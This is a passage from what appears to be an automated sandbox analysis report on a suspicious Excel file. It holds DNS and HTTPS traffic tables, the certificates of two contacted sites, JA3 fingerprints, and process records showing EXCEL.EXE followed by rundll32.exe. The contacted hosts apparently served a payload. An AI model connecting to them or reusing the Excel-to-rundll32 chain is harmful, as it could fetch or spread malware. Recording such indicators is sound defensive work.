Jun 29, 2021 17:47:50.334995031 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:50.806651115 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:50.863733053 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:52.137634039 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:52.195139885 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:53.036922932 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:53.091938019 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:53.562647104 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:53.620580912 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:53.920418024 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:53.978780031 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:54.111597061 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:54.166781902 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:06.916482925 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:06.980088949 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:07.127794027 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:07.192032099 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:09.685049057 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:09.743271112 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:41.242436886 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:41.307627916 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:48:42.787632942 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:48:42.853935957 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 29, 2021 17:47:16.690315008 CEST | 192.168.2.4 | 8.8.8.8 | 0xe30f | Standard query (0) | | A (IP address) | IN (0x0001) |
Jun 29, 2021 17:47:18.234659910 CEST | 192.168.2.4 | 8.8.8.8 | 0x544f | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 29, 2021 17:47:16.874973059 CEST | 8.8.8.8 | 192.168.2.4 | 0xe30f | No error (0) | | | 162.241.2.112 | A (IP address) | IN (0x0001) |
Jun 29, 2021 17:47:18.292426109 CEST | 8.8.8.8 | 192.168.2.4 | 0x544f | No error (0) | | | 108.179.232.80 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 29, 2021 17:47:17.197526932 CEST | 162.241.2.112 | 443 | 192.168.2.4 | 49734 | CN=psq.com.mx | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Jul 28 02:00:00 CEST 2020 | Thu Jul 29 01:59:59 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
| | | | | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031 | | |
Jun 29, 2021 17:47:18.617918968 CEST | 108.179.232.80 | 443 | 192.168.2.4 | 49736 | CN=www.academy.haleemcampus.com | CN=R3, O=Let's Encrypt, C=US | Tue May 25 09:21:24 CEST 2021 | Mon Aug 23 09:21:24 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
| | | | | CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | | |
| | | | | CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 | | |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 17:47:10 |
Start date: | 29/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe40000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:49:08 |
Start date: | 29/06/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x20000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:49:09 |
Start date: | 29/06/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x20000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|